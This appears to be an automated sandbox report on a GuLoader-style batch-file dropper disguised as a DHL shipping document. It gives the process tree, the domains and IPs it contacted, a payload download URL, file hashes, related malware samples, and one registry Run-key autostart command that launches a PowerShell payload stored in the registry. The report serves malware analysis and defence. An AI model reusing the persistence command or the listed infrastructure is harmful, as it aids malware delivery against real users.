Defense Evasion: 1 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 111 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 112 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID 1473659)
Sample: rDHL_PT56385793568927578365... | Start date: 15/07/2024 | Architecture: WINDOWS | Score: 100
Contacted domains: tejarat-gram.com, econstramedia.com
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures

Process tree (child processes indented under their parent):
cmd.exe
    signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found
    powershell.exe
        network: econstramedia.com 103.211.216.55, 443, 49730, PUBLIC-DOMAIN-REGISTRYUS, Seychelles
        signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
        powershell.exe
            signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
            wab.exe
                network: tejarat-gram.com 185.83.114.124, 443, 49737, HOSTIRAN-NETWORKIR, Iran (ISLAMIC Republic Of)
                cmd.exe
                    conhost.exe
                    reg.exe
            cmd.exe
        conhost.exe
        cmd.exe
    conhost.exe

Source | Detection | Scanner | Label | Link
rDHL_PT563857935689275783656385FV-GDS3535353.bat | 39% | ReversingLabs | Script.Trojan.Tnega |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://econstramedia.com/S | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Samsende.jpbXR | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Sam | 0% | Avira URL Cloud | safe |
https://tejarat-gram.com/duWJGPYoYurORY170.bin | 100% | Avira URL Cloud | phishing |
https://econstramedia.com/Sa | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Samse | 0% | Avira URL Cloud | safe |
https://tejarat-gram.com/duWJGPYoYurORY170.binArbesKoneconstramedia.com/duWJGPYoYurORY170.bin | 100% | Avira URL Cloud | phishing |
https://econstramedia.com/Samsen | 0% | Avira URL Cloud | safe |
https://econstramedia.com/ | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Samsende. | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Samsende.jp | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Samsende.j | 0% | Avira URL Cloud | safe |
http://econstramedia.com | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Samsend | 0% | Avira URL Cloud | safe |
https://econstramedia.co | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Samsende.jpb | 0% | Avira URL Cloud | safe |
https://econstramedia.c | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Sams | 0% | Avira URL Cloud | safe |
https://econstramedia.com/Samsende | 0% | Avira URL Cloud | safe |
https://econstramedia.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tejarat-gram.com | 185.83.114.124 | true | false | | unknown
econstramedia.com | 103.211.216.55 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://tejarat-gram.com/duWJGPYoYurORY170.bin | false | Avira URL Cloud: phishing | unknown
https://econstramedia.com/Samsende.jpb | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://econstramedia.com/S | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://econstramedia.com/Samse | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://econstramedia.com/Samsende.jpbXR | powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://econstramedia.com/ | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.2470375891.0000018D4B6E6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://econstramedia.com/Sam | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://econstramedia.com/Samsen | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://tejarat-gram.com/duWJGPYoYurORY170.binArbesKoneconstramedia.com/duWJGPYoYurORY170.bin | wab.exe, 0000000A.00000002.2427597487.00000000243B0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://econstramedia.com/Sa | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://econstramedia.com/Samsende.jp | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://econstramedia.com/Samsende. | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.2250127984.00000000043C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://econstramedia.com/Samsende | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://econstramedia.com/Samsende.j | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://econstramedia.co | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://econstramedia.com/Samsend | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://econstramedia.com/Sams | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2470375891.0000018D4A471000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://econstramedia.com | powershell.exe, 00000002.00000002.2470375891.0000018D4C214000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2470375891.0000018D4A471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2250127984.00000000043C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://econstramedia.c | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://econstramedia.com | powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4BCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4A69D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.83.114.124 | tejarat-gram.com | Iran (ISLAMIC Republic Of) | | 59441 | HOSTIRAN-NETWORKIR | false
103.211.216.55 | econstramedia.com | Seychelles | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1473659
                Start date and time:2024-07-15 17:36:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:rDHL_PT563857935689275783656385FV-GDS3535353.bat
                Detection:MAL
                Classification:mal100.troj.evad.winBAT@18/9@2/2
                EGA Information:
                • Successful, ratio: 33.3%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 55
                • Number of non-executed functions: 48
                Cookbook Comments:
                • Found application associated with file extension: .bat
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 6716 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 6988 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: rDHL_PT563857935689275783656385FV-GDS3535353.bat
Time | Type | Description
11:36:59 | API Interceptor | 131x Sleep call for process: powershell.exe modified
11:38:09 | API Interceptor | 3x Sleep call for process: wab.exe modified
16:37:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Scleroconjunctival %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)
16:37:57 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Scleroconjunctival %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.83.114.124rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  103.211.216.55Drawing.exeGet hashmaliciousFormBookBrowse
                  • www.geetamalhotra.com/dq6e/?4h6ptXe=gCmk4CY41YBRNzkMIgpxHLDcJO/SeUa6sXhnC1aM++ZU7dPip1JMqQzcDB9b/rk3DAuPkc/TTQ==&w2=JBZ8
                  SOA #093732.exeGet hashmaliciousFormBookBrowse
                  • www.skyrosceramic.com/hme1/?jPw=XbK6B4uri6OvF71KFs1AoR4G+KEYZc4e7kHOoPVYJEZl8k4bIJ+n3z//pieZBY82GR+z&y2JhS=6lr41hZpgNXtF
                  documents-2112491607.xlsmGet hashmaliciousHidden Macro 4.0Browse
                  • kullumanalitours.com/ds/index.html
                  documents-1660683173.xlsmGet hashmaliciousHidden Macro 4.0Browse
                  • kullumanalitours.com/ds/index.html
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  econstramedia.comrFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  • 103.211.216.55
                  BL1+2 DRAFT.cmdGet hashmaliciousFormBook, GuLoaderBrowse
                  • 103.211.216.55
                  BL1+2 DRAFT.cmdGet hashmaliciousGuLoaderBrowse
                  • 103.211.216.55
                  BL1+2DRAFT .cmdGet hashmaliciousFormBook, GuLoaderBrowse
                  • 103.211.216.55
                  tejarat-gram.comrFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  • 185.83.114.124
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  PUBLIC-DOMAIN-REGISTRYUShttps://www.google.com.au/url?q=//www.google.co.nz/amp/s/ibuyhousekeys.com/document/findattached.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 208.91.199.118
                  Solicitud urgente de presupuestoNueva colaboraci#U00f3n pdf.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.223
                  http://www.veathika.com/cgi-bin/june.phpGet hashmaliciousHTMLPhisherBrowse
                  • 5.100.155.8
                  z1X3Z1ohoefF078ij.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.225
                  Products and Quote.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.225
                  https://mail.pfl.fyi/v1/messages/01909fdd-253c-74e4-a4d4-2d3080c42178/click?link_id=01909fdd-2577-78fa-9aa1-1363f665f21c&signature=ec89d906ae45cddf78ff2ac5ff90a7b4fb4098deGet hashmaliciousUnknownBrowse
                  • 208.91.199.181
                  Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.225
                  https://www.ijopjournal.comGet hashmaliciousUnknownBrowse
                  • 103.53.42.223
                  rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  • 103.211.216.55
                  z2PKRSEkM9edbE7Om.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.223
                  HOSTIRAN-NETWORKIRrFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  • 185.83.114.124
                  Shipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.49
                  PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.49
                  PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.49
                  PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.35
                  Overdue Account.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.35
                  https://hamrahansystem.com/4xe3cx/?PliaTEYmfRshGet hashmaliciousUnknownBrowse
                  • 45.138.134.33
                  Saham_Man.apkGet hashmaliciousIRATABrowse
                  • 5.144.130.58
                  Invoice-AWB-Document.doc.exeGet hashmaliciousAgentTeslaBrowse
                  • 5.144.130.32
                  https://wro16kdfl.lavinphysio.com/?qp=c2FuYWJyaWF0QGhpbGxzYm9yb3VnaGNvdW50eS5vcmc=Get hashmaliciousUnknownBrowse
                  • 5.144.130.49
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  3b5074b1b5d032e5620f69f9f700ff0e | start1.bat | malicious | Unknown | 103.211.216.55
                   | List of 20 computers and CPUs.bat | malicious | Unknown | 103.211.216.55
                   | Health records + X- ray (2).bat | malicious | Unknown | 103.211.216.55
                   | HealthInde.bat | malicious | Unknown | 103.211.216.55
                   | http://24usred.com/0kqZRS | malicious | Unknown | 103.211.216.55
                   | https://bmryw2w4c4m3dw.inwise.net/Page_7-15-2024_1 | malicious | Phisher | 103.211.216.55
                   | https://www.mynewsbreak.me/redirect-v2?originalUrl=aHR0cHM6Ly90cmFjay5oZWFsdGh5am9pbnRhaWQuY29tL2YwYmIzYjZlLWEyZjktNDBiYy1hZTNiLWQ0YmI5NzE0OTBlNT9jYW1wYWlnbmlkPTE3OTgzMTc0Mjk5OTAxMDUwODkmZmxpZ2h0aWQ9MTc5ODMxODI1NDM3OTExNDQ5NyZjcmVhdGl2ZWlkPTE3OTgzMjIxNzg0MjQ1NzgwNDkmdGlkPW5ld3NicmVha18xNzk4MzE3NDI5OTkwMTA1MDg5XzE3OTgzMTgyNTQzNzkxMTQ0OTdfMTc5ODMyMjE3ODQyNDU3ODA0OSZjbGlja2lkPW52c3NfMDkyODBlYmFmNTEwNDgyZmJkZGRkZjg4N2VhOWE0ZThfMTc5ODMyMjE3ODQyNDU3ODA0OSZpc19ub3ZhPXRydWUmbmJfY2lkPTA5MjgwZWJhZjUxMDQ4MmZiZGRkZGY4ODdlYTlhNGU4XzE3OTgzMjIxNzg0MjQ1NzgwNDk%3D&bucket=dmg_local_email_bucket_18&message_id=qk4YypJ-1SsY65wP&tag=subscribed&exps=nl_bucket_exp_24_2-v3%2Cnl_monetization_24_2-control%2Cnl_prerollout_24_2-v1%2Cnova_traffic_exp_full_09-v26&event_name=emailLinkClick&hashed_email=bb7f633dc30a2a97e85bd33fed777bd2a3f9c2541b52eb64ff345914e50393a5&email_domain=minotsbs.com&meta=eyJzdWJzX3RvcGljIjogImxvY2FsIiwgImZyZXEiOiAiZGFpbHkiLCAic2VuZF90cyI6IDE3MjA5NTkxNzcsICJsaW5rIjogIlNzS3hBQUJpIiwgInBvcyI6ICJsb2dvIiwgImFkX2lkIjogIjE3OTgzMjIxNzg0MjQ1NzgwNDkiLCAibm92YV9zbmFwc2hvdF9pZCI6ICIwOTI4MGViYWY1MTA0ODJmYmRkZGRmODg3ZWE5YTRlOF8xNzk4MzIyMTc4NDI0NTc4MDQ5In0%3D | malicious | Unknown | 103.211.216.55
                   | rTransaction_ReceiptCopy.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 103.211.216.55
                   | Purchase Order -JJ023639PDF.scr.exe | malicious | Unknown | 103.211.216.55
                   | Brnesde.exe | malicious | GuLoader, Snake Keylogger | 103.211.216.55
                  37f463bf4616ecd445d4a1937da06e19 | start1.bat | malicious | Unknown | 185.83.114.124
                   | Health records + X- ray (2).bat | malicious | Unknown | 185.83.114.124
                   | SecuriteInfo.com.Trojan.NSIS.Injector.28272.29476.exe | malicious | GuLoader, RedLine | 185.83.114.124
                   | Brnesde.exe | malicious | GuLoader, Snake Keylogger | 185.83.114.124
                   | NewOrder_LCL240887.exe | malicious | GuLoader, Snake Keylogger | 185.83.114.124
                   | Makrokdernes.exe | malicious | GuLoader, Snake Keylogger | 185.83.114.124
                   | doc20240715-00014.bat.exe | malicious | GuLoader | 185.83.114.124
                   | setup.exe | malicious | Unknown | 185.83.114.124
                   | setup.exe | malicious | Unknown | 185.83.114.124
                   | SecuriteInfo.com.W32.Kryptik.CI.tr.21358.1519.exe | malicious | Unknown | 185.83.114.124
                  No context
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):11608
                  Entropy (8bit):4.8908305915084105
                  Encrypted:false
                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                  MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                  SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                  SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                  SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1940658735648508
                  Encrypted:false
                  SSDEEP:3:Nlllulbnolz:NllUc
                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                  Malicious:false
                  Preview:@...e................................................@..........
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6221
                  Entropy (8bit):3.7360410460421316
                  Encrypted:false
                  SSDEEP:48:ZcNMccLPr3C4U28IjPukvhkvklCywCgmdd6xDlR4SogZoL096xDl44SogZoLg1:eZc33CxHIakvhkvCCtE6xDZHz6xD6Hn
                  MD5:82DD9C04BA4E66C88E3786F6161829F4
                  SHA1:D9C8D518DB4DE42D7472F11C8A6826ADA9B42E5A
                  SHA-256:8372739C05818C3143FC820B00D145A5D9656F78946BACAE042E62D6F710F281
                  SHA-512:0EA19C3A1A501CB29BF92FB30DC277C1B5C0DAB6160A558E56E409269BFA12FD48150AB249FF68E9323DCD24CFF5B8EE3D19112AB507B8E458E982CB1532C92D
                  Malicious:false
                  Preview:...................................FL..................F.".. ...-/.v....k.%.....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....94......E.,.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.|...........................%..A.p.p.D.a.t.a...B.V.1......X.|..Roaming.@......CW.^.X.|..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X.|..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X.|....Q...........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6221
                  Entropy (8bit):3.7360410460421316
                  Encrypted:false
                  SSDEEP:48:ZcNMccLPr3C4U28IjPukvhkvklCywCgmdd6xDlR4SogZoL096xDl44SogZoLg1:eZc33CxHIakvhkvCCtE6xDZHz6xD6Hn
                  MD5:82DD9C04BA4E66C88E3786F6161829F4
                  SHA1:D9C8D518DB4DE42D7472F11C8A6826ADA9B42E5A
                  SHA-256:8372739C05818C3143FC820B00D145A5D9656F78946BACAE042E62D6F710F281
                  SHA-512:0EA19C3A1A501CB29BF92FB30DC277C1B5C0DAB6160A558E56E409269BFA12FD48150AB249FF68E9323DCD24CFF5B8EE3D19112AB507B8E458E982CB1532C92D
